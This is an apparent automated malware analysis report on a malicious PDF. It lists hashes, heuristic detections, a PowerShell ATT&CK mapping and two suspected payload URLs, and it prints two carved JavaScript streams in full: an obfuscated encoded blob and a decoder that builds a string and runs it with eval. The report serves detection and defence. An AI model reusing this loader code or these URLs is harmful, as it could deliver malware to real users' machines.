Malicious PDF — malware analysis report

Static analysis result for SHA-256 b8c25da042b3bee6…

MALICIOUS

PDF

2.7 KB First seen: 2026-05-10
MD5: 89e6eab1e4fe553b422e8b8bb6262e33 SHA-1: 158924dc6e9d3e001578551a1d515fe976aa636d SHA-256: b8c25da042b3bee6a6c07889507509ebb9347fd9d216997d47cffdcef0964ae7
158 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The JavaScript stream utilizes `eval()` and `String.fromCharCode`, suggesting an attempt to obfuscate malicious code. This code is likely designed to download and execute a second-stage payload, a common technique for initial access. The extracted file `javascript_obj111712_001.js` contains obfuscated JavaScript, further supporting this assessment.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    eval(yuyufzg);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://d2F.QK/_-a Referenced by PDF JavaScript
    • http://G.TK/ZGNUReferenced by PDF JavaScript
🗂 Part of campaign: d2f.qk 21 samples

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111711_000.js pdf-javascript-stream PDF /JS object 111711 at offset 0x197 2596 bytes
SHA-256: b45cbe3522830ab5950c2cce5e4195d28db709a15f368f5ef612efc724a59cdb
Preview script
First 1,000 lines of the extracted script
ctbsdn="0F1-1]1f2Z1d2d1b3]1`2h1^3?3Q1X1Y2J2]1<1U3L1M1P1Q3f3h1N3.3;1E1H1I33351F2W2Y1?1B3T1@3E3G1=3A3I1819273X1013142L2T112U2V1.383b0^1*3`0i2b0e0f3R3Y0c3a0a3[0_2g3+0Q0Z3K0T0W3_0U3S3c0R2f3V0O2[0K0L242R0I3^0G2X3-000=0B2O0@2^0>3Z3d090:3M3P072_053N032S0131370,0-2`3O0*2a2c";brkvbn="A602ZBDFJcKb=gLj00C8hY7MM]T1D70SDG3?TD^IDPMaGJ^eBhNEeGY0Jcg2:j@7=I<9Ca-9SQdYS_ID5,1NK<5cMI=Wc_11K,.38ZCh6:h-L=V0I=7MMZK-<FH.38ZCh6:F<GJ^eCiI2BiD-7;_IHJH]7h8N7VKE^Bcg2:E@L-1<=V0I=7MMZ_Q1K,7?<9@==9`]aMgjU@fGKMg9e_7LL_fH7+[c:K,5P-.PC8b@VX282KbA`0=Dh9.3NV,.ZX8K6?Q:JTCN2*Eg2**.3OZ+,EGgR<=JXK8W:2<Z+4.?gJK96,N2/5+,4-^2;O^T:OJg]._Z9K96*>34`JK5+h_3dLT:NT@,.[@G,CSPZJ*-R:1*.2CAGK*GEB:**2=DJe.XfIK**1:P?*2=[CV3fWC,CW,ZJ*-R=,J.3cGg2**.3@R+,@_@:J*-R=[*.3fWC,CW,ZJ*-R<=J,.+`HK9C:V35+>K*5_R:**2<SQK,4V*:Qi1:NLXS,DCER<QEV32R@K9.*:QX`N3E4/K**,ZP/*2:@?U,*f,ZJ**:PVg>3:YXK*5J:J**:P+KB:@?U,*f8K***K*-P:J+^2=@H4.RAb:J8^B:**2=[B@.haVK/I:V2**@.ZR+,*16K5JU@.-8C,D^[:O,ie.+aE,**+,?UKB=0,].**G,H2*K9GU2=7R@.**G,B>*K9-YK***K4`*2<aL].**G,H2*K9GU2=7R@.**G,<F*:J8U_3f4/K3B4N2+Ha.**,.TCc:LU*.3jK_32UT:PP@e.Saf,<4/R=[*.3fWC,@]KB:**V3K:,./ODZJ8ZV2**.3U9/,>5fR:,c.2**.3JB@./ODZJ8^R:**2:*dN2*F].`QLK4/h_2-Va.**,.g@/K9GU2;Q>5,**/K64*:J+^2<c4`K*^P:PVg>3:YXK*GPZJ**:ODc@.[JVK**1:JUJ,.]XA:P6^B=-6/,>OQZJ**:J**:J**:J**:J**:J**:J**:J**:QCC>3OO@K8Xf2=*>.2Tb8K58fc<`*,.db?K5>e_3[H/,Fd;B;:O/K*,^R=VVT.Z/@K8TRV3Cb<K8W`R=V>@.?3>R=/*.3ag4.?hVK8Oa:KKJ+,?5cR<TY/,>,::LVCV2>?ER=[??,<G>>2CW*K*,?2:**2:^*O,*?[N2**.2]fXK9Z3:J/FC,**+,4-^2=d4i.G<Q:KP+4.*UM2:**2:]ffR:,XU,**+,+3O_2c^gK**,ZM-*,.,=5R;[Qd,**/K6**K0A66K9Z3:J/FC,**+,CU-2<c]=R=8CG,IJ<K*4c].**,.SbLK5OH4.U=1:M8U4.?E+:PD/R==5<K6b;:O^K<K*OR:K?IN2**@.Nc*K+GAR;ObG,D/1:J<*V2eYd,**/K9.*:M5TG,IJ<K*4c].**,._]NR:*F.2**.2**.2**.2**.2**.2**.2**.3cJ,.FCi:J*+B=8*2=I[>3@XI,?U@V3Pd@.+^-2=ZSV2BC5B:,TW,EGSN3P>O,@SKB<`EA:KGWV3DOU:J+DN3KF].WD`2;<XU,G=WK8G`B=5GD.Wb?K8SZR<^X].>*+,Gb@K/*U2:XhD.?jC,*1C,45_R;>XG,/bYK8h::J*R2;?Xi.>,U:KD]C,F>WB=TG@.eTVK8/aZKG?N2U/<K8ZWB;?Xa.eTLZLK4,.eKDZLJ5V2R8i.c>TZNXOG,,**9/dVFH.2:LdJ[/KY5a*-iI.1.PC8b@VXIPiQ;hRV2H</E11K,.2XB6;YS_JcJ7GJ***KW.HU-HAV*1gi2HL*`]iga89,.2;FZBNf+Q_[+[.8eiR]EAScK+*22::,*gAP[[c:K,=V0I=.1.T`7CYW=;f8ZCh6H]7h8bP[[c:K,5P-.P[IPcE9C>JcM_0V4+:4+:KW.+UV***AL0a:0XZ***a89,.2<T_BM`FZBLdHRD^>5S]-L*a2XAT0V`,eFLi37Lj7ZaH]UBLdHRD^>5S]1Rh.Y0Jcg2:K,.B678ESFY>7CT/_dX]-L=V0I=.9;3P=W`U5P[[c:K,0Ncg2:K/^+L7+ej@1[OgIN1.:fUeM3WHQL*.H5^Bcg2:K-hB`7h2hD-`iV9M5cjIPiQ;hRV2YL*`a**Y7+ej@1[OgIN9:cM:HY`KgCI1fBcg2:K0JhIU-c]i9]-L1JiIMZ:h.D-`iV9M5cjE11K,.2]DCiX@_IQhDbEV6IKj@KV>@QAU:HY`KgCI1hdVFH.2D:";asfsgpj=2751;function yrand(gojleth){if(gojleth>92)gojleth--;return gojleth-42}coepc=new Array();
javascript_obj111712_001.js pdf-javascript-stream PDF /JS object 111712 at offset 0x8E0 524 bytes
SHA-256: 60da17ecf51dde45c912f4b6787e29ef60da3c6441c0532387b5b89fe8682689
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function GetCode(arg){var ar=String.fromCharCode(arg,131,130).split('');var an=ar.pop();var an=ar.pop();return ar.join('');}while(ctbsdn.length){coepc.push((yrand(ctbsdn.charCodeAt(0))<<(4+2))+yrand(ctbsdn.charCodeAt(1))-(500+12));ctbsdn=ctbsdn.slice(2,ctbsdn.length)}aphlg=dngnkph=ctbsdn=0;yuyufzg='';function ymyqgqk(){if(ctbsdn==0){dngnkph=yrand(brkvbn.charCodeAt(aphlg++));ctbsdn=6;}return ((dngnkph>>--ctbsdn)&0x01);}while(asfsgpj--){i=0;while(coepc[i]<0){if(ymyqgqk())i=-coepc[i];else i++;}yuyufzg+=GetCode(coepc[i]);}